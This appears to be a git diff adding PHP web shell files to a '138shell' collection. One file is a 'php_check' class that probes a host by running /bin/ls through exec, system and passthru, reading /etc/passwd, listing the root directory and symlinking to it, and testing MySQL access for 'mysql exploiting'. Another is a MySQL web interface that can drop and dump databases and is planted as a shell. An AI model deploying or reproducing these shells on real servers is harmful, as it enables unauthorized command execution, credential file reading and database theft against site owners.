+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        echo "<b>checking system functions:</b>\n";
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        echo "<b>checking reading functions:</b>\n";
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        echo "<b>checking misc filesystem functions:</b>\n";
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        echo "<b>checking mysql functions:</b>\n";
+            $stater = $this->mysql_checks();
+            if ($stater==2) { $this->output_mainstate(2, "mysql checks"); }
+            if ($stater==1) { $this->output_mainstate(1, "mysql checks"); }
+            if ($stater==0) { $this->output_mainstate(0, "mysql checks"); }
+        if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: <font color=green>NOT VULNERABLE</font>\n"; } else { echo "\n\n\nPHP check returned: <font color=red>VULNERABLE</font>\n"; }
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+            if ($state==3) {
+            echo "$name\t\t<font color=yellow>skipped</font>\n";
+            }
+        }
+
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==0) {
+            echo "\n$name returned: <font color=green>OK</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==2) {
+            echo "\n$name returned: <font color=yellow>SKIPPED</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- \n";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        echo "<!-- \n";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            echo "<!--";
+            if (@require_once($file)) { echo "-->"; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            echo "<!--";
+            if (@require($file)) { echo "-->"; $this->output_state(1, "require    "); $sys = true; } else { echo "-->"; $this->output_state(0, "require    "); }
+            }
+            if (@function_exists("include")) {
+            echo "<!--";
+            if (@include($file)) { echo "-->"; $this->output_state(1, "include   "); $sys = true; } else { echo "-->"; $this->output_state(0, "include   "); }
+            }
+            //if (@function_exists("highlight_file")) {
+            echo "<!--";
+            if (@highlight_file($file)) { echo "-->"; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); }
+            //}
+            //if (@function_exists("virtual")) {
+            echo "<!--";
+            if (@virtual($file)) { echo "-->"; $this->output_state(1, "virtual   "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual  "); }
+            //}
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; }
+            if ($this->mysql_state=="fail") {
+            echo "\n\n<!-- MYSQL ERROR:\n".mysql_error()."\n-->\n\n";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+    class php_check_silent
+    {
+
+        function php_check_silent($host="notset", $username="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $username;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        $this->mysql_checks();
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            //echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            //echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            //echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+        }
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            //echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            } else {
+            //echo "\n$name returned: <font color=green>OK</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- ";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        echo "<!-- ";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); }
+            }
+            if (@function_exists("include")) {
+            if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); }
+            }
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_state=="fail") {
+            echo "<!-- MYSQL ERROR:\n".mysql_error()."\n-->";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+
+
+// the end :]
+?>
+<center>Copyright © 2003 <a href="http://www.bansacviet.net">BSV Groups</a>
+<br>PHP Shell Support by <a href="mailto:admin@bansacviet.net">DTN</a> 
\ No newline at end of file
diff --git a/138shell/M/mysql_shell.txt b/138shell/M/mysql_shell.txt
new file mode 100644
index 0000000..13cd5c8
--- /dev/null
+++ b/138shell/M/mysql_shell.txt
@@ -0,0 +1,1169 @@
+<?
+/*
+ * MySQL Web Interface Version 0.8
+ * -------------------------------
+ * Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+ * License : GNU Public License (GPL)
+ * Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+ */
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+	echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
